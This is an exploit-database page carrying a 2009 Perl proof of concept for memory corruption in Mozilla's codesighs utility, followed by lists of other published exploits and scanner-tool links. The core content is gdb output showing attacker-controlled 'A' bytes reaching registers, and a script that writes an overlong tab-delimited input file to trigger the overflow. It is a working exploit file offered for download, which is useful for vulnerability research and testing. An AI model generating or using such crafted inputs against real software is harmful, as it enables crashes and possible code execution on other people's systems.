"Mozilla Codesighs - Memory Corruption"

Author

Exploit author

"Jeremy Brown"

Platform

Exploit platform

linux

Release date

Exploit published date

2009-12-12

                
                    
                         Download file
                    
                
            
#!/usr/bin/perl
# thedailyshow.pl
# AKA
# Mozilla Codesighs Memory Corruption PoC
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.12.2009
#
# *********************************************************************************************************
#
# 257	    while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
# (gdb) 
# 259	        trimWhite(lineBuffer);
# (gdb) 
# trimWhite (inString=0xbfffd310 "1\tCODE\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 145 times>...) at codesighs.c:213
# 213	    int len = strlen(inString);
# (gdb) 
# 215	    while(len)
# (gdb) 
# 217	        len--;
# (gdb) 
# 219	        if(isspace(*(inString + len)))
# (gdb) 
# 221	            *(inString + len) = '\0';
# (gdb) 
# 215	    while(len)
# (gdb) 
# 217	        len--;
# (gdb) 
# 219	        if(isspace(*(inString + len)))
# (gdb) 
# 228	}
# (gdb) 
# codesighs (inOptions=0xbffff350) at codesighs.c:261
# 261	        scanRes = sscanf(lineBuffer,
# (gdb) i r
# eax            0x0	0
# ecx            0xb7fe468c	-1208072564
# edx            0x82	130
# ebx            0x9d8ff4	10326004
# esp            0xbfffd040	0xbfffd040
# ebp            0xbffff328	0xbffff328
# esi            0x0	0
# edi            0x0	0
# eip            0x8048945	0x8048945 <codesighs+142>
# eflags         0x246	[ PF ZF IF ]
# cs             0x73	115
# ss             0x7b	123
# ds             0x7b	123
# es             0x7b	123
# fs             0x0	0
# gs             0x33	51
# (gdb) s
# 270	        if(6 == scanRes)
# (gdb) i r
# eax            0x6	6
# ecx            0x414141	4276545
# edx            0x0	0
# ebx            0x9d8ff4	10326004
# esp            0xbfffd040	0xbfffd040
# ebp            0xbffff328	0xbffff328
# esi            0x0	0
# edi            0x0	0
# eip            0x804899d	0x804899d <codesighs+230>
# eflags         0x282	[ SF IF ]
# cs             0x73	115
# ss             0x7b	123
# ds             0x7b	123
# es             0x7b	123
# fs             0x0	0
# gs             0x33	51
# (gdb)
#
# http://jbrownsec.blogspot.com/2009/12/mozilla-code-sighs.html
#
# "Can't read my, can't read my, no she can't read my poker face"
#
# *********************************************************************************************************
# thedailyshow.pl

$filename = $ARGV[0];

if(!defined($filename))
{

     print "Usage: $0 <filename>\n";
     exit;

}

$payload = "1\tCODE\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 260 . "\t";

     open(FILE, ">", $filename) or die("\nError: Can't write to $filename");
     print FILE $payload;
     close(FILE);

     print "Wrote payload to \"$filename\"\n";
     exit;

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-11-27	"libupnp 1.6.18 - Stack-based buffer overflow (DoS)"	dos	linux	"Patrik Lantz"
2020-11-24	"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)"	webapps	linux	"Giuseppe Fuggiano"
2020-10-28	"aptdaemon < 1.1.1 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"PackageKit < 1.1.13 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion"	webapps	linux	"Ivo Palazzolo"
2020-10-28	"Blueman < 2.1.4 - Local Privilege Escalation"	local	linux	"Vaisha Bernard"
2020-09-11	"Gnome Fonts Viewer 3.34.0 - Heap Corruption"	local	linux	"Cody Winkler"
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution"	webapps	linux	"Critical Start"

Release Date	Title	Type	Platform	Author
2019-10-15	"Podman & Varlink 1.5.1 - Remote Code Execution"	remote	linux	"Jeremy Brown"
2019-10-14	"Ajenti 2.1.31 - Remote Code Execution"	webapps	python	"Jeremy Brown"
2016-12-06	"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)"	dos	windows	"Jeremy Brown"
2016-12-04	"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution"	remote	hardware	"Jeremy Brown"
2015-06-10	"Libmimedir - '.VCF' Memory Corruption (PoC)"	dos	linux	"Jeremy Brown"
2015-06-03	"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token"	webapps	hardware	"Jeremy Brown"
2015-06-03	"Seagate Central 2014.0410.0026-F - Remote Command Execution"	remote	hardware	"Jeremy Brown"
2015-05-20	"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation"	local	windows	"Jeremy Brown"
2015-01-28	"ClearSCADA - Remote Authentication Bypass"	remote	windows	"Jeremy Brown"
2011-06-07	"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM"	remote	windows	"Jeremy Brown"
2011-03-23	"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities"	dos	windows	"Jeremy Brown"
2011-03-23	"Progea Movicon 11 - 'TCPUploadServer' Remote File System"	remote	windows	"Jeremy Brown"
2011-01-25	"Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)"	dos	windows	"Jeremy Brown"
2011-01-14	"Objectivity/DB - Lack of Authentication"	dos	windows	"Jeremy Brown"
2010-12-18	"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)"	dos	windows	"Jeremy Brown"
2010-09-16	"BACnet OPC Client - Local Buffer Overflow (1)"	local	windows	"Jeremy Brown"
2009-12-12	"Mozilla Codesighs - Memory Corruption"	local	linux	"Jeremy Brown"
2009-12-07	"Polipo 1.0.4 - Remote Memory Corruption (PoC)"	dos	linux	"Jeremy Brown"
2009-12-07	"gAlan 0.2.1 - Local Buffer Overflow (1)"	local	windows	"Jeremy Brown"
2009-11-16	"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)"	dos	windows_x86	"Jeremy Brown"
2009-10-28	"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation"	local	windows	"Jeremy Brown"
2009-10-06	"Geany .18 - Local File Overwrite"	local	linux	"Jeremy Brown"
2009-09-24	"Sun Solaris 10 RPC dmispd - Denial of Service"	dos	solaris	"Jeremy Brown"
2009-09-09	"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow"	local	linux	"Jeremy Brown"
2009-09-09	"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)"	dos	windows	"Jeremy Brown"
2009-09-09	"Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service"	dos	windows_x86	"Jeremy Brown"
2009-07-21	"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation"	local	windows	"Jeremy Brown"
2009-05-07	"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow"	local	windows	"Jeremy Brown"
2009-03-12	"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow"	remote	windows	"Jeremy Brown"
2009-02-27	"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)"	remote	windows	"Jeremy Brown"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Mozilla Codesighs - Memory Corruption"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.